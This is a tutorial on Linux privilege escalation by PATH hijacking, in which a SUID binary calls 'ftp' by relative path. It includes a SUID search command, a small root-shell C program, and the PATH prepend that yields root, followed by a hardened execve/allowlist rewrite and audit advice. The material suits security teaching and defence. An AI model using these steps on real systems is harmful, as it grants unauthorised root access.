Privilege Escalation: Sudo Binary Relative Path
Sudo Binary Relative Path:
There are times when you are looking for a SUID binary or one that already has sudo rights. You may come across a binary that you are not familiar with and that may not have any online presence in the security community. In these cases you take a look at the binary yourself to determine whether there is anything quick you can do to escalate.
For this type of attack the binary must be calling another binary using a relative path rather than an absolute one.
Relative:
ftp
Absolute:
/usr/bin/ftp
We can abuse this by building our own ftp binary and having the SUID or sudo binary execute ours instead of the expected one. This works because of how Linux resolves relative paths.
When an application is called using a relative path the OS will first look in the same directory, AKA the output of pwd. If it cannot find the binary there it will go through each directory in PATH in order. So if we add a new location such as /tmp to the front of our PATH environment variable and place a binary called ftp there, we can trick the SUID binary into executing our own.
First we will want to take a quick look for any SUID binaries we can take a peek at.
find / -perm -4000 2>/dev/null
We see that there is one binary we may find interesting, /usr/bin/backup. Running it seems to throw an error, but let's take a look with the strings application.
strings /usr/bin/backup
After looking through this output we can see the application seems to be calling ftp to ftp.example.com. It looks to be using a relative path instead of an absolute one, so let's take advantage of this.
We can do this with our own binary, or we can use a symlink to /bin/bash. In our example we will use a small C application to give us a shell.
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */
int main(void) {
    setuid(0);             /* keep the effective root privilege inherited from the SUID binary */
    setgid(0);
    system("/bin/sh");     /* string literal needs double quotes in C */
    return 0;
}
# Compile it
gcc ftp.c -o ftp
Now that we have this compiled in /tmp/, we must prepend the directory containing the new ftp binary to our PATH environment variable.
export PATH=/tmp:$PATH
This keeps the current path and prepends the directory holding our binary. When we run the backup executable we can see that we now have a root shell.
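From the defender's side, the fix for the backup binary described above is to never let a privileged program resolve a helper through the caller's PATH. The following is an added example, not code from the original post: it shows the vulnerable system("ftp ...") pattern beside a hardened form that uses an absolute path from a fixed allowlist, execve instead of a shell, and a clean environment. The allowlist entries (/usr/bin/ftp, /bin/tar) are hypothetical locations.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Returns 1 when a command string would be resolved through PATH,
 * i.e. its first word contains no '/'. This is the pattern strings
 * revealed in the backup binary ("ftp ftp.example.com"). */
int uses_path_lookup(const char *cmd) {
    size_t n = strcspn(cmd, " \t");
    return memchr(cmd, '/', n) == NULL;
}

/* Allowlist of helpers a privileged program may run, by absolute path.
 * Hypothetical entries; adjust to the real helper locations. */
static const char *const ALLOWED[][2] = {
    { "ftp", "/usr/bin/ftp" },
    { "tar", "/bin/tar" },
};

const char *trusted_path(const char *name) {
    for (size_t i = 0; i < sizeof ALLOWED / sizeof ALLOWED[0]; i++)
        if (strcmp(ALLOWED[i][0], name) == 0)
            return ALLOWED[i][1];
    return NULL;  /* unknown helper: refuse rather than search PATH */
}

/* Vulnerable form, as the post describes: system() hands "ftp host"
 * to /bin/sh, which walks the caller's PATH, so /tmp/ftp wins. */
int run_helper_vulnerable(const char *host) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "ftp %s", host);
    return system(cmd);
}

/* Hardened form: absolute path from the allowlist, execve (no shell),
 * and a fixed environment so the caller's PATH is never consulted. */
int run_helper_hardened(const char *name, const char *host) {
    const char *path = trusted_path(name);
    if (!path) return -1;
    static char *const env[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)name, (char *)host, NULL };
        execve(path, argv, env);
        _exit(127);  /* exec failed: do not fall back to a shell */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The same check applies when auditing: a SUID binary whose strings show a bare command name next to a host or file argument is a candidate for this hijack, while one that shows absolute paths and sets its own PATH is not.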